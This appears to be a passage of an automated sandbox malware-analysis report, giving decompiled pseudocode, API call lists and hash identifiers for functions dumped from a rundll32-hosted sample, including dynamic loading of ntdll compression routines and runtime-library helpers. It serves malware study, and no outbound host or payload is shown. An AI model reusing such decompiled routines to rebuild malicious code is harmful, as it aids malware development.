                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID: conf$dbug$init
                                                                                              • API String ID: 2422867632-3701578037
                                                                                              • Opcode ID: 05d6c49819740f405c515135637cb18ec3d08149420882d1e90adc235d6fd4eb
                                                                                              • Instruction ID: 738896541f554b0ce1e0a699968f56346726e035653ea75b2539d82096f33b0b
                                                                                              • Opcode Fuzzy Hash: 05d6c49819740f405c515135637cb18ec3d08149420882d1e90adc235d6fd4eb
                                                                                              • Instruction Fuzzy Hash: C931B8313207019FF730AF75D904B2A73E1AF84755F16496CE9498B5A0EBB0F986CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 34%
                                                                                              			E042592E0(void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v9;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v21;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v25;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v29;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v44;
                                                                                              				char _v48;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v52;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v61;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				intOrPtr _v69;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v72;
                                                                                              				intOrPtr _v73;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v76;
                                                                                              				intOrPtr _v81;
                                                                                              				intOrPtr* _v92;
                                                                                              				char _v108;
                                                                                              				char _v109;
                                                                                              				void* _v112;
                                                                                              				void* _v113;
                                                                                              				char* _v116;
                                                                                              				char _v120;
                                                                                              				intOrPtr _v121;
                                                                                              				char _v124;
                                                                                              				signed int _t44;
                                                                                              				void* _t52;
                                                                                              				void** _t69;
                                                                                              				intOrPtr* _t71;
                                                                                              				intOrPtr _t72;
                                                                                              				signed int _t81;
                                                                                              				signed int _t83;
                                                                                              				signed int _t84;
                                                                                              
                                                                                              				_t83 = (_t81 & 0xfffffff8) - 0x7c;
                                                                                              				_t44 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t44 ^ _t83;
                                                                                              				E04257980( &_v108);
                                                                                              				_v68 = 0x429e048;
                                                                                              				_v64 = 0;
                                                                                              				_v60 = 0x429e024;
                                                                                              				_v56 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v28 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v76 = 0;
                                                                                              				_v72 = 0;
                                                                                              				_v52 = 0;
                                                                                              				_v48 = 0x43;
                                                                                              				E04258AE0( &_v108,  *0x42a78d4 & 0x0000ffff);
                                                                                              				_t69 =  &_v112;
                                                                                              				_t84 = _t83 - 0xc;
                                                                                              				_push( *0x42a4760 & 0x0000ffff);
                                                                                              				_push(0x42a78d8);
                                                                                              				if(E04258BB0(_t69) != 0) {
                                                                                              					_v120 = 0x429e8b0;
                                                                                              					_v116 =  &_v108;
                                                                                              					_v52 =  &_v120;
                                                                                              					_t52 = CreateEventW(0, 1, 0, 0);
                                                                                              					_push(_t69);
                                                                                              					_push(0x3f);
                                                                                              					_v112 = _t52;
                                                                                              					_push(1);
                                                                                              					_push( &_v124);
                                                                                              					_v120 = 0x429ec8c;
                                                                                              					_v124 = 0x4a;
                                                                                              					E04251C60(_v116);
                                                                                              					_t71 = _v92;
                                                                                              					if(_t71 != 0) {
                                                                                              						 *((intOrPtr*)( *_t71 + 0x14))(0xffffffff);
                                                                                              					}
                                                                                              					_t72 = _v73;
                                                                                              					if(_t72 != 0) {
                                                                                              						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x14))(0xffffffff);
                                                                                              					}
                                                                                              					_v121 = 0x429e8b0;
                                                                                              					CloseHandle(_v113);
                                                                                              					_v121 = 0x429e8c0;
                                                                                              				}
                                                                                              				E04258C90( &_v109);
                                                                                              				_t57 = _v29;
                                                                                              				if(_v29 != 0) {
                                                                                              					E04275B0F(_t57);
                                                                                              					_t84 = _t84 + 4;
                                                                                              				}
                                                                                              				_t58 = _v81;
                                                                                              				_v21 = 0;
                                                                                              				_v29 = 0;
                                                                                              				_v25 = 0;
                                                                                              				_v61 = 0x429df88;
                                                                                              				_v69 = 0x429e008;
                                                                                              				if(_v81 != 0) {
                                                                                              					E04275B0F(_t58);
                                                                                              					_t84 = _t84 + 4;
                                                                                              				}
                                                                                              				return E04275AFE(_v9 ^ _t84);
                                                                                              			}









































                                                                                              0x042592e6
                                                                                              0x042592e9
                                                                                              0x042592f0
                                                                                              0x04259300
                                                                                              0x0425930a
                                                                                              0x04259312
                                                                                              0x0425931a
                                                                                              0x04259322
                                                                                              0x0425932a
                                                                                              0x04259332
                                                                                              0x0425933a
                                                                                              0x04259342
                                                                                              0x0425934a
                                                                                              0x04259352
                                                                                              0x0425935a
                                                                                              0x04259362
                                                                                              0x04259367
                                                                                              0x04259373
                                                                                              0x04259377
                                                                                              0x0425937a
                                                                                              0x0425937b
                                                                                              0x04259387
                                                                                              0x04259399
                                                                                              0x042593a1
                                                                                              0x042593ad
                                                                                              0x042593b1
                                                                                              0x042593b7
                                                                                              0x042593bc
                                                                                              0x042593be
                                                                                              0x042593c6
                                                                                              0x042593c8
                                                                                              0x042593c9
                                                                                              0x042593d1
                                                                                              0x042593d6
                                                                                              0x042593db
                                                                                              0x042593e1
                                                                                              0x042593e7
                                                                                              0x042593e7
                                                                                              0x042593ea
                                                                                              0x042593f0
                                                                                              0x042593fa
                                                                                              0x042593fa
                                                                                              0x04259403
                                                                                              0x0425940b
                                                                                              0x04259411
                                                                                              0x04259411
                                                                                              0x0425941d
                                                                                              0x04259422
                                                                                              0x04259428
                                                                                              0x0425942b
                                                                                              0x04259430
                                                                                              0x04259430
                                                                                              0x04259433
                                                                                              0x04259437
                                                                                              0x0425943f
                                                                                              0x04259447
                                                                                              0x0425944f
                                                                                              0x04259457
                                                                                              0x04259461
                                                                                              0x04259464
                                                                                              0x04259469
                                                                                              0x04259469
                                                                                              0x0425947d

                                                                                              APIs
                                                                                                • Part of subcall function 04257980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0426B836), ref: 042579B0
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 042579C2
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 042579D5
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 042579E8
                                                                                              • CreateEventW.KERNEL32(00000000,00000001), ref: 042593B1
                                                                                              • CloseHandle.KERNEL32(0429E8B0,00000000,00000001,0000003F), ref: 0425940B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                                                              • String ID: C$J
                                                                                              • API String ID: 1850149996-3934036899
                                                                                              • Opcode ID: 2010068c4372d8b25cb7b478e6fe4e59496ffeec0eb00b90f9511350ec843386
                                                                                              • Instruction ID: 10add8fce69db18ef84db0e074250f4740f80effa21a4c2e18a214a70b48dd73
                                                                                              • Opcode Fuzzy Hash: 2010068c4372d8b25cb7b478e6fe4e59496ffeec0eb00b90f9511350ec843386
                                                                                              • Instruction Fuzzy Hash: 184118B16283419FE710DF64D458B1BBBE4AF85708F10091CF9A19A2E0D7B5E948CB93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0428FC34(void* __eflags, signed int _a4) {
                                                                                              				intOrPtr _t13;
                                                                                              				void* _t21;
                                                                                              				signed int _t33;
                                                                                              				long _t35;
                                                                                              
                                                                                              				_t33 = _a4;
                                                                                              				if(E0428CF71(_t33) != 0xffffffff) {
                                                                                              					_t13 =  *0x42a7680; // 0x683320
                                                                                              					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                                                                                              						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                                                                                              							goto L7;
                                                                                              						} else {
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					} else {
                                                                                              						L6:
                                                                                              						_t21 = E0428CF71(2);
                                                                                              						if(E0428CF71(1) == _t21) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						L7:
                                                                                              						if(CloseHandle(E0428CF71(_t33)) != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						_t35 = GetLastError();
                                                                                              						L9:
                                                                                              						E0428CEE0(_t33);
                                                                                              						 *((char*)( *((intOrPtr*)(0x42a7680 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                                                                                              						if(_t35 == 0) {
                                                                                              							return 0;
                                                                                              						}
                                                                                              						return E0428173C(_t35) | 0xffffffff;
                                                                                              					}
                                                                                              				}
                                                                                              				L1:
                                                                                              				_t35 = 0;
                                                                                              				goto L9;
                                                                                              			}







                                                                                              0x0428fc3b
                                                                                              0x0428fc48
                                                                                              0x0428fc4e
                                                                                              0x0428fc56
                                                                                              0x0428fc64
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428fc6c
                                                                                              0x0428fc6c
                                                                                              0x0428fc6e
                                                                                              0x0428fc80
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428fc82
                                                                                              0x0428fc92
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428fc9a
                                                                                              0x0428fc9c
                                                                                              0x0428fc9d
                                                                                              0x0428fcb5
                                                                                              0x0428fcbc
                                                                                              0x00000000
                                                                                              0x0428fcca
                                                                                              0x00000000
                                                                                              0x0428fcc5
                                                                                              0x0428fc56
                                                                                              0x0428fc4a
                                                                                              0x0428fc4a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,0428FB52,?), ref: 0428FC8A
                                                                                              • GetLastError.KERNEL32(?,0428FB52,?), ref: 0428FC94
                                                                                              • __dosmaperr.LIBCMT ref: 0428FCBF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                              • String ID: 3h
                                                                                              • API String ID: 2583163307-1879970728
                                                                                              • Opcode ID: 56f0ac77e964b7fbb42dc7d0856a461072d3f7708ca03ad706919c7725d5e6b7
                                                                                              • Instruction ID: 969016895b4ed1a9f9e9a14872396967e50a9566096789a9e0719f84edc86cd6
                                                                                              • Opcode Fuzzy Hash: 56f0ac77e964b7fbb42dc7d0856a461072d3f7708ca03ad706919c7725d5e6b7
                                                                                              • Instruction Fuzzy Hash: 34016F3273715016E314B638A98877E77458FA2B38F2B011EEC05C71D1DF65BD818164
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E0428B2BC(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				unsigned int _v20;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				char _v40;
                                                                                              				intOrPtr _v48;
                                                                                              				char _v52;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* _t86;
                                                                                              				signed int _t92;
                                                                                              				signed int _t93;
                                                                                              				signed int _t94;
                                                                                              				signed int _t100;
                                                                                              				void* _t101;
                                                                                              				void* _t102;
                                                                                              				void* _t104;
                                                                                              				void* _t107;
                                                                                              				void* _t109;
                                                                                              				void* _t111;
                                                                                              				void* _t115;
                                                                                              				char* _t116;
                                                                                              				void* _t119;
                                                                                              				signed int _t121;
                                                                                              				signed int _t128;
                                                                                              				signed int* _t129;
                                                                                              				signed int _t136;
                                                                                              				signed int _t137;
                                                                                              				char _t138;
                                                                                              				signed int _t139;
                                                                                              				signed int _t142;
                                                                                              				signed int _t146;
                                                                                              				signed int _t151;
                                                                                              				char _t156;
                                                                                              				char _t157;
                                                                                              				void* _t161;
                                                                                              				unsigned int _t162;
                                                                                              				signed int _t164;
                                                                                              				signed int _t166;
                                                                                              				signed int _t170;
                                                                                              				void* _t171;
                                                                                              				signed int* _t172;
                                                                                              				signed int _t174;
                                                                                              				signed int _t181;
                                                                                              				signed int _t182;
                                                                                              				signed int _t183;
                                                                                              				signed int _t184;
                                                                                              				signed int _t185;
                                                                                              				signed int _t186;
                                                                                              				signed int _t187;
                                                                                              
                                                                                              				_t171 = __edx;
                                                                                              				_t181 = _a24;
                                                                                              				if(_t181 < 0) {
                                                                                              					_t181 = 0;
                                                                                              				}
                                                                                              				_t184 = _a8;
                                                                                              				 *_t184 = 0;
                                                                                              				E0427EF84(0,  &_v52, _t171, _a36);
                                                                                              				_t5 = _t181 + 0xb; // 0xb
                                                                                              				if(_a12 > _t5) {
                                                                                              					_t172 = _a4;
                                                                                              					_t142 = _t172[1];
                                                                                              					_v36 =  *_t172;
                                                                                              					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                                              					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                                              						L11:
                                                                                              						__eflags = _t142 & 0x80000000;
                                                                                              						if((_t142 & 0x80000000) != 0) {
                                                                                              							 *_t184 = 0x2d;
                                                                                              							_t184 = _t184 + 1;
                                                                                              							__eflags = _t184;
                                                                                              						}
                                                                                              						__eflags = _a28;
                                                                                              						_v16 = 0x3ff;
                                                                                              						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                                              						__eflags = _t172[1] & 0x7ff00000;
                                                                                              						_v32 = _t136;
                                                                                              						_t86 = 0x30;
                                                                                              						if((_t172[1] & 0x7ff00000) != 0) {
                                                                                              							 *_t184 = 0x31;
                                                                                              							_t185 = _t184 + 1;
                                                                                              							__eflags = _t185;
                                                                                              						} else {
                                                                                              							 *_t184 = _t86;
                                                                                              							_t185 = _t184 + 1;
                                                                                              							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                                              							__eflags = _t164;
                                                                                              							if(_t164 != 0) {
                                                                                              								_v16 = 0x3fe;
                                                                                              							} else {
                                                                                              								_v16 = _v16 & _t164;
                                                                                              							}
                                                                                              						}
                                                                                              						_t146 = _t185;
                                                                                              						_t186 = _t185 + 1;
                                                                                              						_v28 = _t146;
                                                                                              						__eflags = _t181;
                                                                                              						if(_t181 != 0) {
                                                                                              							_t30 = _v48 + 0x88; // 0xffce8305
                                                                                              							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                                                              						} else {
                                                                                              							 *_t146 = 0;
                                                                                              						}
                                                                                              						_t92 = _t172[1] & 0x000fffff;
                                                                                              						__eflags = _t92;
                                                                                              						_v20 = _t92;
                                                                                              						if(_t92 > 0) {
                                                                                              							L23:
                                                                                              							_t33 =  &_v8;
                                                                                              							 *_t33 = _v8 & 0x00000000;
                                                                                              							__eflags =  *_t33;
                                                                                              							_t147 = 0xf0000;
                                                                                              							_t93 = 0x30;
                                                                                              							_v12 = _t93;
                                                                                              							_v20 = 0xf0000;
                                                                                              							do {
                                                                                              								__eflags = _t181;
                                                                                              								if(_t181 <= 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t119 = E04291A30( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                              								_t161 = 0x30;
                                                                                              								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                                              								__eflags = _t121 - 0x39;
                                                                                              								if(_t121 > 0x39) {
                                                                                              									_t121 = _t121 + _t136;
                                                                                              									__eflags = _t121;
                                                                                              								}
                                                                                              								_t162 = _v20;
                                                                                              								_t172 = _a4;
                                                                                              								 *_t186 = _t121;
                                                                                              								_t186 = _t186 + 1;
                                                                                              								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                                              								_t147 = _t162 >> 4;
                                                                                              								_t93 = _v12 - 4;
                                                                                              								_t181 = _t181 - 1;
                                                                                              								_v20 = _t162 >> 4;
                                                                                              								_v12 = _t93;
                                                                                              								__eflags = _t93;
                                                                                              							} while (_t93 >= 0);
                                                                                              							__eflags = _t93;
                                                                                              							if(_t93 < 0) {
                                                                                              								goto L39;
                                                                                              							}
                                                                                              							_t115 = E04291A30( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                              							__eflags = _t115 - 8;
                                                                                              							if(_t115 <= 8) {
                                                                                              								goto L39;
                                                                                              							}
                                                                                              							_t54 = _t186 - 1; // 0x2
                                                                                              							_t116 = _t54;
                                                                                              							_t138 = 0x30;
                                                                                              							while(1) {
                                                                                              								_t156 =  *_t116;
                                                                                              								__eflags = _t156 - 0x66;
                                                                                              								if(_t156 == 0x66) {
                                                                                              									goto L33;
                                                                                              								}
                                                                                              								__eflags = _t156 - 0x46;
                                                                                              								if(_t156 != 0x46) {
                                                                                              									_t139 = _v32;
                                                                                              									__eflags = _t116 - _v28;
                                                                                              									if(_t116 == _v28) {
                                                                                              										_t57 = _t116 - 1;
                                                                                              										 *_t57 =  *(_t116 - 1) + 1;
                                                                                              										__eflags =  *_t57;
                                                                                              									} else {
                                                                                              										_t157 =  *_t116;
                                                                                              										__eflags = _t157 - 0x39;
                                                                                              										if(_t157 != 0x39) {
                                                                                              											 *_t116 = _t157 + 1;
                                                                                              										} else {
                                                                                              											 *_t116 = _t139 + 0x3a;
                                                                                              										}
                                                                                              									}
                                                                                              									goto L39;
                                                                                              								}
                                                                                              								L33:
                                                                                              								 *_t116 = _t138;
                                                                                              								_t116 = _t116 - 1;
                                                                                              							}
                                                                                              						} else {
                                                                                              							__eflags =  *_t172;
                                                                                              							if( *_t172 <= 0) {
                                                                                              								L39:
                                                                                              								__eflags = _t181;
                                                                                              								if(_t181 > 0) {
                                                                                              									_push(_t181);
                                                                                              									_t111 = 0x30;
                                                                                              									_push(_t111);
                                                                                              									_push(_t186);
                                                                                              									E0427DEA0(_t181);
                                                                                              									_t186 = _t186 + _t181;
                                                                                              									__eflags = _t186;
                                                                                              								}
                                                                                              								_t94 = _v28;
                                                                                              								__eflags =  *_t94;
                                                                                              								if( *_t94 == 0) {
                                                                                              									_t186 = _t94;
                                                                                              								}
                                                                                              								__eflags = _a28;
                                                                                              								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                              								_t174 = _a4[1];
                                                                                              								_t100 = E04291A30( *_a4, 0x34, _t174);
                                                                                              								_t137 = 0;
                                                                                              								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                                              								__eflags = _t151;
                                                                                              								asm("sbb ebx, ebx");
                                                                                              								if(__eflags < 0) {
                                                                                              									L47:
                                                                                              									 *(_t186 + 1) = 0x2d;
                                                                                              									_t187 = _t186 + 2;
                                                                                              									__eflags = _t187;
                                                                                              									_t151 =  ~_t151;
                                                                                              									asm("adc ebx, 0x0");
                                                                                              									_t137 =  ~_t137;
                                                                                              									goto L48;
                                                                                              								} else {
                                                                                              									if(__eflags > 0) {
                                                                                              										L46:
                                                                                              										 *(_t186 + 1) = 0x2b;
                                                                                              										_t187 = _t186 + 2;
                                                                                              										L48:
                                                                                              										_t182 = _t187;
                                                                                              										_t101 = 0x30;
                                                                                              										 *_t187 = _t101;
                                                                                              										__eflags = _t137;
                                                                                              										if(__eflags < 0) {
                                                                                              											L56:
                                                                                              											__eflags = _t187 - _t182;
                                                                                              											if(_t187 != _t182) {
                                                                                              												L60:
                                                                                              												_push(0);
                                                                                              												_push(0xa);
                                                                                              												_push(_t137);
                                                                                              												_push(_t151);
                                                                                              												_t102 = E042918F0();
                                                                                              												_v32 = _t174;
                                                                                              												 *_t187 = _t102 + 0x30;
                                                                                              												_t187 = _t187 + 1;
                                                                                              												__eflags = _t187;
                                                                                              												L61:
                                                                                              												_t104 = 0x30;
                                                                                              												_t183 = 0;
                                                                                              												__eflags = 0;
                                                                                              												 *_t187 = _t151 + _t104;
                                                                                              												 *(_t187 + 1) = 0;
                                                                                              												goto L62;
                                                                                              											}
                                                                                              											__eflags = _t137;
                                                                                              											if(__eflags < 0) {
                                                                                              												goto L61;
                                                                                              											}
                                                                                              											if(__eflags > 0) {
                                                                                              												goto L60;
                                                                                              											}
                                                                                              											__eflags = _t151 - 0xa;
                                                                                              											if(_t151 < 0xa) {
                                                                                              												goto L61;
                                                                                              											}
                                                                                              											goto L60;
                                                                                              										}
                                                                                              										if(__eflags > 0) {
                                                                                              											L51:
                                                                                              											_push(0);
                                                                                              											_push(0x3e8);
                                                                                              											_push(_t137);
                                                                                              											_push(_t151);
                                                                                              											_t107 = E042918F0();
                                                                                              											_v32 = _t174;
                                                                                              											 *_t187 = _t107 + 0x30;
                                                                                              											_t187 = _t187 + 1;
                                                                                              											__eflags = _t187 - _t182;
                                                                                              											if(_t187 != _t182) {
                                                                                              												L55:
                                                                                              												_push(0);
                                                                                              												_push(0x64);
                                                                                              												_push(_t137);
                                                                                              												_push(_t151);
                                                                                              												_t109 = E042918F0();
                                                                                              												_v32 = _t174;
                                                                                              												 *_t187 = _t109 + 0x30;
                                                                                              												_t187 = _t187 + 1;
                                                                                              												__eflags = _t187;
                                                                                              												goto L56;
                                                                                              											}
                                                                                              											L52:
                                                                                              											__eflags = _t137;
                                                                                              											if(__eflags < 0) {
                                                                                              												goto L56;
                                                                                              											}
                                                                                              											if(__eflags > 0) {
                                                                                              												goto L55;
                                                                                              											}
                                                                                              											__eflags = _t151 - 0x64;
                                                                                              											if(_t151 < 0x64) {
                                                                                              												goto L56;
                                                                                              											}
                                                                                              											goto L55;
                                                                                              										}
                                                                                              										__eflags = _t151 - 0x3e8;
                                                                                              										if(_t151 < 0x3e8) {
                                                                                              											goto L52;
                                                                                              										}
                                                                                              										goto L51;
                                                                                              									}
                                                                                              									__eflags = _t151;
                                                                                              									if(_t151 < 0) {
                                                                                              										goto L47;
                                                                                              									}
                                                                                              									goto L46;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L23;
                                                                                              						}
                                                                                              					}
                                                                                              					__eflags = 0;
                                                                                              					if(0 != 0) {
                                                                                              						goto L11;
                                                                                              					} else {
                                                                                              						_t183 = E0428B5BF(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                                              						__eflags = _t183;
                                                                                              						if(_t183 == 0) {
                                                                                              							_t128 = E0427DA60(_t184, 0x65);
                                                                                              							_pop(_t166);
                                                                                              							__eflags = _t128;
                                                                                              							if(_t128 != 0) {
                                                                                              								__eflags = _a28;
                                                                                              								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                              								__eflags = _t170;
                                                                                              								 *_t128 = _t170;
                                                                                              								 *((char*)(_t128 + 3)) = 0;
                                                                                              							}
                                                                                              							_t183 = 0;
                                                                                              						} else {
                                                                                              							 *_t184 = 0;
                                                                                              						}
                                                                                              						goto L62;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t129 = E04281772();
                                                                                              					_t183 = 0x22;
                                                                                              					 *_t129 = _t183;
                                                                                              					E0427EEE6();
                                                                                              					L62:
                                                                                              					if(_v40 != 0) {
                                                                                              						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                                              					}
                                                                                              					return _t183;
                                                                                              				}
                                                                                              			}
























































                                                                                              0x0428b2bc
                                                                                              0x0428b2c7
                                                                                              0x0428b2ce
                                                                                              0x0428b2d0
                                                                                              0x0428b2d0
                                                                                              0x0428b2d2
                                                                                              0x0428b2db
                                                                                              0x0428b2dd
                                                                                              0x0428b2e2
                                                                                              0x0428b2e8
                                                                                              0x0428b2fe
                                                                                              0x0428b303
                                                                                              0x0428b306
                                                                                              0x0428b313
                                                                                              0x0428b318
                                                                                              0x0428b36c
                                                                                              0x0428b374
                                                                                              0x0428b376
                                                                                              0x0428b378
                                                                                              0x0428b37b
                                                                                              0x0428b37b
                                                                                              0x0428b37b
                                                                                              0x0428b381
                                                                                              0x0428b389
                                                                                              0x0428b39c
                                                                                              0x0428b39f
                                                                                              0x0428b3a1
                                                                                              0x0428b3a4
                                                                                              0x0428b3a5
                                                                                              0x0428b3c6
                                                                                              0x0428b3c9
                                                                                              0x0428b3c9
                                                                                              0x0428b3a7
                                                                                              0x0428b3a7
                                                                                              0x0428b3a9
                                                                                              0x0428b3b4
                                                                                              0x0428b3b4
                                                                                              0x0428b3b6
                                                                                              0x0428b3bd
                                                                                              0x0428b3b8
                                                                                              0x0428b3b8
                                                                                              0x0428b3b8
                                                                                              0x0428b3b6
                                                                                              0x0428b3ca
                                                                                              0x0428b3cc
                                                                                              0x0428b3cd
                                                                                              0x0428b3d0
                                                                                              0x0428b3d2
                                                                                              0x0428b3dc
                                                                                              0x0428b3e6
                                                                                              0x0428b3d4
                                                                                              0x0428b3d4
                                                                                              0x0428b3d4
                                                                                              0x0428b3eb
                                                                                              0x0428b3eb
                                                                                              0x0428b3f0
                                                                                              0x0428b3f3
                                                                                              0x0428b3fe
                                                                                              0x0428b3fe
                                                                                              0x0428b3fe
                                                                                              0x0428b3fe
                                                                                              0x0428b402
                                                                                              0x0428b409
                                                                                              0x0428b40a
                                                                                              0x0428b40d
                                                                                              0x0428b410
                                                                                              0x0428b410
                                                                                              0x0428b412
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b42a
                                                                                              0x0428b431
                                                                                              0x0428b435
                                                                                              0x0428b438
                                                                                              0x0428b43b
                                                                                              0x0428b43d
                                                                                              0x0428b43d
                                                                                              0x0428b43d
                                                                                              0x0428b43f
                                                                                              0x0428b442
                                                                                              0x0428b445
                                                                                              0x0428b447
                                                                                              0x0428b44f
                                                                                              0x0428b455
                                                                                              0x0428b458
                                                                                              0x0428b45b
                                                                                              0x0428b45c
                                                                                              0x0428b45f
                                                                                              0x0428b462
                                                                                              0x0428b462
                                                                                              0x0428b467
                                                                                              0x0428b46a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b482
                                                                                              0x0428b487
                                                                                              0x0428b48b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b48f
                                                                                              0x0428b48f
                                                                                              0x0428b492
                                                                                              0x0428b493
                                                                                              0x0428b493
                                                                                              0x0428b495
                                                                                              0x0428b498
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b49a
                                                                                              0x0428b49d
                                                                                              0x0428b4a4
                                                                                              0x0428b4a7
                                                                                              0x0428b4aa
                                                                                              0x0428b4c0
                                                                                              0x0428b4c0
                                                                                              0x0428b4c0
                                                                                              0x0428b4ac
                                                                                              0x0428b4ac
                                                                                              0x0428b4ae
                                                                                              0x0428b4b1
                                                                                              0x0428b4bc
                                                                                              0x0428b4b3
                                                                                              0x0428b4b6
                                                                                              0x0428b4b6
                                                                                              0x0428b4b1
                                                                                              0x00000000
                                                                                              0x0428b4aa
                                                                                              0x0428b49f
                                                                                              0x0428b49f
                                                                                              0x0428b4a1
                                                                                              0x0428b4a1
                                                                                              0x0428b3f5
                                                                                              0x0428b3f5
                                                                                              0x0428b3f8
                                                                                              0x0428b4c3
                                                                                              0x0428b4c3
                                                                                              0x0428b4c5
                                                                                              0x0428b4c7
                                                                                              0x0428b4ca
                                                                                              0x0428b4cb
                                                                                              0x0428b4cc
                                                                                              0x0428b4cd
                                                                                              0x0428b4d5
                                                                                              0x0428b4d5
                                                                                              0x0428b4d5
                                                                                              0x0428b4d7
                                                                                              0x0428b4da
                                                                                              0x0428b4dd
                                                                                              0x0428b4df
                                                                                              0x0428b4df
                                                                                              0x0428b4e1
                                                                                              0x0428b4f3
                                                                                              0x0428b4f7
                                                                                              0x0428b4fa
                                                                                              0x0428b501
                                                                                              0x0428b509
                                                                                              0x0428b509
                                                                                              0x0428b50c
                                                                                              0x0428b50e
                                                                                              0x0428b51f
                                                                                              0x0428b51f
                                                                                              0x0428b523
                                                                                              0x0428b523
                                                                                              0x0428b526
                                                                                              0x0428b528
                                                                                              0x0428b52b
                                                                                              0x00000000
                                                                                              0x0428b510
                                                                                              0x0428b510
                                                                                              0x0428b516
                                                                                              0x0428b516
                                                                                              0x0428b51a
                                                                                              0x0428b52d
                                                                                              0x0428b52d
                                                                                              0x0428b531
